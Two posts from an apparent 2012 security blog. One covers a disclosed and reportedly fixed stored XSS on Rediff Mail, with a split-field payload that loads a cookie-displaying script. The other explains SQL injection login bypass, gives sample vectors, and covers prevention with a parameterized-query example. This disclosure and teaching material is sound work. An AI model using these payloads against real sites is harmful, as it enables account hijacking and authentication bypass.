Monday, November 12, 2012

Stored XSS On Rediff Mail

Hi Guys, I recently discovered a Stored XSS issue on Rediff Mail and also reported this issue to Rediff recently. :-)
But I didn't get any credit; still, never mind.
They actually dropped me a mail on my personal id saying that the issue has been fixed now.
I will show an exact demonstration of that Stored XSS issue.
But, first of all, I will tell you what XSS basically is.

XSS (Cross-Site Scripting)-
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute it. Because the browser thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.
There are basically two types of XSS:
1) Reflected XSS Attacks
2) Stored XSS Attacks

So, let's get started with the attack.
Now, this is an extremely critical vulnerability, as a user will be attacked simply by visiting the malicious user's profile, and the malicious script will execute in the victim's browser.
Here is a proof of concept of Stored XSS on Rediffmail :)
1) Hosted a JavaScript file locally
with the following content (it writes the cookie into the page and pops it in an alert, to prove the script runs in the victim's origin):
document.write("Stored XSS " + document.cookie);
alert("cookie Value" + document.cookie);
Hosted JavaScript for XSS:Securityvin32
2) Parameters affected: School and College combined
Here is the tricky part I faced during the XSS:
here the individual School and College parameters didn't give an XSS alert.
So I tried to combine both fields by using the following vector:
School:
/><SCRIPT SRC="http://localhost/xss/xss.js"/*
College:
*/></SCRIPT>

3) After saving the attack vector in his profile,
any user who visits the attacker's profile will get the malicious script executed in his browser.


Thursday, August 9, 2012

SQL Injection

Hi, today I am going to explain the things you have to know about SQL Injection.
  1. What is SQL injection
  2. How it works
  1. What is SQL injection:- SQL injection is an attack vector in which the attacker directly executes SQL queries against the database through a vulnerable web application. The attacker can perform any SQL query, like SELECT, UPDATE, CREATE or DELETE, on the database. SQL injection is not limited to gaining access to the database; it can also lead to compromise of the operating system.
  2. How it works: SQL injection works by breaking the original SQL query using OR, UNION, AND.
For e.g.: a web application has a Sign in form where the user enters his username and password for authentication, and the web application builds the following SQL query from them.
User_table has the following contents:
ID   USERNAME   PASSWORD
1    Admin      Admin
2    Vinesh     Security
3    Vin32      Vin32
4    Secure     Secure

Select * from User_table where Username="Vinesh" and Password="security"
What if the attacker uses this functionality to perform SQL injection by breaking the above SQL query?
Attack vector:  "or 1=1--
When the attacker uses this attack vector in the Username field, the following query will be executed by the web application:
Select * from User_table where Username=" "or 1=1--and Password="security"
As you can see, the query now has a blank username with an OR condition of 1=1, which is always true, and the -- comments out the rest of the query, including the password part, so the password field is never checked.
So the attacker would log on as the first user in the table, that is Admin, without entering any credentials.
Similar attack vectors used in SQL injection:
' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* ' 


Below mentioned is source code vulnerable to SQL injection,

where the user enters his id and gets the details of his firstname and lastname.
What if the attacker uses this feature and exploits it with SQL injection to get all the details in the database?


How to prevent SQL Injection
  • Use Prepared Statements (Parameterized Queries)
  • Use Stored Procedures
  • Escape all user-supplied input
  • Also enforce: a least-privilege database user
  • Also perform: white-list input validation
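The login bypass above and the first prevention item, as an added example (not the post's own code): a constructed in-memory SQLite copy of User_table is queried once with string concatenation, which the post's ' or '1'='1' -- ' vector breaks, and once with a prepared statement, which treats the same input as plain data. The SQL uses single-quoted string literals, as in the vectors listed above, rather than the double quotes in the post's query.

```python
import sqlite3

# Constructed sample data mirroring the post's User_table (illustrative values only).
SAMPLE_USERS = [
    (1, "Admin", "Admin"),
    (2, "Vinesh", "Security"),
    (3, "Vin32", "Vin32"),
    (4, "Secure", "Secure"),
]


def make_db():
    """In-memory SQLite database loaded with the constructed User_table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE User_table (ID INTEGER, USERNAME TEXT, PASSWORD TEXT)")
    conn.executemany("INSERT INTO User_table VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_query(username, password):
    """The string-concatenation pattern the post breaks: user input becomes SQL text."""
    return ("SELECT * FROM User_table WHERE USERNAME='" + username
            + "' AND PASSWORD='" + password + "'")


def login_vulnerable(conn, username, password):
    """Runs the concatenated query. Returns the USERNAME the application would
    log in as, or None when no row matches. A quote in the input ends the
    literal early and '--' comments out the password check, so the first row
    (Admin) comes back for a crafted username and any password."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[1] if row else None


def login_parameterized(conn, username, password):
    """Prepared statement: the SQL text is fixed and the driver binds the two
    values separately, so quotes and comment markers are matched literally
    against the USERNAME column and never change the query's structure."""
    query = "SELECT * FROM User_table WHERE USERNAME=? AND PASSWORD=?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    db = make_db()
    vector = "' or '1'='1' -- '"
    print(build_vulnerable_query(vector, "x"))
    print("vulnerable   :", login_vulnerable(db, vector, "x"))      # Admin
    print("parameterized:", login_parameterized(db, vector, "x"))  # None
```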
Reference URL:
https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet
https://www.owasp.org/index.php/SQL_Injection